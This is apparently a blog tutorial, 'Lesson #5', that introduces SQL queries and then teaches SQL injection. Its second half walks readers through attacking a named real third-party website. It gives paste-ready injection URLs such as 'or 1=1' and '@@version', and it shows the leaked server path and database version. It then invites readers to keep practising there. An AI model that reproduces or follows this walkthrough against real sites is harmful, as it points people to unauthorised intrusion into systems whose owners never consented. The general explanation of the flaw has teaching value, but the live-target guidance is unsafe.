We learned how to use some of the main functions, such as: Intercepting packets, Targeting them, Repeating requests and even use them for Brute Force attacks.
Lesson #5 : SQL injection : Session No.1
Today we're gonna discuss the famous attack called SQL injection.
Well First, let's step into the code language itself and learn some basic phrases.
SQL (or Structured Query Language) is a programming language designed for managing data in relational database management systems (RDBMS).
Its scope includes data insert, query, update and delete, schema creation and modification, and data access control.
The SQL language is subdivided into several language elements, including:
+ Clauses, which are constituent components of statements and queries.
+ Expressions, which can produce either scalar values or tables consisting of columns and rows of data.
+ Predicates, which specify conditions that can be evaluated to SQL three-valued logic (3VL) or Boolean (true/false/unknown) truth values and which are used to limit the effects of statements and queries, or to change program flow.
+ Queries, which retrieve the data based on specific criteria. This is the most important element of SQL.
+ Statements, which may have a persistent effect on schemata and data, or which may control transactions, program flow, connections, sessions, or diagnostics.
O.k. after the boring part.. Let's jump into the Queries:
The most common operation in SQL is the query, which is performed with the declarative SELECT statement. SELECTretrieves data from one or more tables, or expressions. Standard SELECT statements have no persistent effects on the database.
Queries allow the user to describe desired data, leaving the database management system (DBMS) responsible for planning, optimizing, and performing the physical operations necessary to produce that result as it chooses.
+ The FROM clause which indicates the table(s) from which data is to be retrieved.
+ The WHERE clause includes a comparison predicate, which restricts the rows returned by the query. The WHEREclause eliminates all rows from the result set for which the comparison predicate does not evaluate to True.
And now... The example:
This query returns a list of expensive books. * means "return all table's columns",
FROM [tableName], in our case - Book, WHERE the column named "price" has a raw that hold a value larger than 100.00, and when on the table please order the raws by the "title" column.
------------------------------------------
SELECT *
FROM Book
WHERE price > 100.00
ORDER BY title;
------------------------------------------
So the answer can look like this:
Title++++++++++++++++++++++ Price ++++ Author
------------------------------------ ++ ------- +++ -------------------------
How to become a Hacker++++| 405.7 ++++| Ido.N
The Joy of Pink ++++++++++++| 132.99 +++| Pink Panther
An Introduction to nonsense+| 221.50 +++| Garfield
Pitfalls of Beer ++++++++++++| 102.00 +++| Homer Simpson
**If you want to see only the "Price" and "Title", all you need to do is SELECT the
right columns.
------------------------------------------
SELECT title, price
FROM Book
...
------------------------------------------
the following is hardly the basics, but you can continue reading here :
http://en.wikipedia.org/wiki/SQL
So now let's talk a little about what exactly is an SQL injection. A SQL injection is often used to attack the security of a website by inputting SQL statements in a web form to get a badly designed website to perform operations on the database (often to dump the database content to the attacker) other than the usual operations as intended by the designer.
SQL injection is a code injection technique that exploits a security vulnerability in a website's software.
The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed.
SQL commands are thus injected from the web form into the database of an application (like queries) to change the database content or dump the database information like credit card or passwords to the attacker. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
This form of SQL injection occurs when user input is not filtered for escape characters and is then passed into an SQL statement. This results in the potential manipulation of the statements performed on the database by the end-user of the application
So now that we understood what is the attack we can dive in to the injection itself.
Let's look at a simple injection.
This is the developer side, or more common - Server side:
- CODE: SELECT ALL
statement = "SELECT * FROM users WHERE name = ' " + userName + " ';"
Here we can see a parameter wich holds a stored procedure, this procedure is taking a value from an end-user in a parameter called "userName" and retrieving the value from the table "users".
After retrieving the user's name from the database, the web form opens a block with this name (if exists, else dropes an error).
If the "userName" variable is crafted in a specific way by a malicious user, the SQL statement may do more than the code author intended. For example, setting the "userName" variable as :
- CODE: SELECT ALL
' or '1'='1
renders the following SQL statement by the parent language:
- CODE: SELECT ALL
SELECT * FROM users WHERE name = '' OR '1'='1';
this example could be used to force the selection of a valid username because the evaluation of '1'='1' is always true.
More than that simple query, there is a way to "break" the query like this:
- CODE: SELECT ALL
' OR '1'='1' UNION SELECT @@version';
This kind of injection will retrieve two tables, one with the valid user and the second with the Database's version.
But they will be displayed toghether.
Here is a live example, please use it to view only!
http://www.istanbuleczaciodasi.org.tr/nobetler.php?t=b&bolgeID=1
This is a trashed Turkish website i've encountred a few months ago.
Let's try and inject something.. shell we
http://www.istanbuleczaciodasi.org.tr/nobetler.php?t=b&bolgeID=1'
What happend?!?
O.k. stay calm.. this is exactly what we wanted to accomplish.
Look at the error on the first raw:
- CODE: SELECT ALL
Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near '\'. (severity 15) in /usr/local/www/ieowwwroot/nobetler.php on line 82
It says:
+ Warning : means code will still run. (errors can crash the site, but warnings don't)
+ mssql_query massage: the warning's details.
** those warning are the hacker's best friend, cause when i can tell you what you did wrong, you will know exactly what to change in order to make it work.
For examlpe:
----------------------------------------------------------------------------------------------------
your query:
http://www.someDomain.com/BFid=1' make breakfast;
breakfast_query_massage: 'there is no egg in the pan'
your next query:
http://www.someDomain.com/BFid=1' take out an agg from the fridge;....make breakfast;
breakfast_query_massage: 'omlet is ready'
----------------------------------------------------------------------------------------------------
+ where the warning has occured :
in /usr/local/www/ieowwwroot/nobetler.php on line 82
You can see the Path Disclosure wich counts as a vulnerability itself.
/usr/local/www/ - means the Server is Linux based.
/ieowwwroot/ is the directory wich the web service is at, and the page that
commited the warning is "nobetter.php"
Now that we understood what went on, we can try to inject our self.
Copy and paste the next Url:
[url]http://www.istanbuleczaciodasi.org.tr/nobetler.php?t=b&bolgeID=1 or 1=1[/url]
Now investigate the differences between bolgeID=1 and bolgeID=1 or 1=1
You'll see that the first displays only 1 option, and the other displays all the options..
this is exactly what we implemented earlier in the example above (remember?
).This means there is an SQL injection attack at hand, and the database can answer queries we will inject in the parameter.
It seams like the query is:
- CODE: SELECT ALL
statment = "SELECT * FROM [sometable] WHERE ID = "' + bolgeID + '";
So as i told you before.. Let's try and "break" this query into retrieving data it shouldn't retrieve...
Copy and paste the next Url:
http://www.istanbuleczaciodasi.org.tr/nobetler.php?t=b&bolgeID=@@version
Now you will see that the warning changed, and the injection succeded.
Let's watch the warning.
Warning: mssql_query() [function.mssql-query]: message: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86) Jul 9 2008 14:43:34 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2, v.2825) ' to data type int. (severity 16) in /usr/local/www/ieowwwroot/nobetler.php on line 82
You can see that I inputed "@@version" into the parameter "bolgeID".
the following error returned:
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86) Jul 9 2008 14:43:34 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2, v.2825) ' to data type int
Means there was a problem converting my input to an input that this parameter suppose to get. --> "to data type int" (int means integer - Natural numbers).
also the query succeded to retrieve the version of the database:
'Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86) Jul 9 2008 14:43:34 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2, v.2825) '
There are a lot of injections that can be commited through this parameter.
I'll let you practice a little
See ya next Session where we discuss the difference between certain databases, and dive even dipper in the queries.
Please download SQL express for next Session.
Thank you for reading.
You're welcome to promote me with inboxing the uTest team.
Cheers,
No comments:
Post a Comment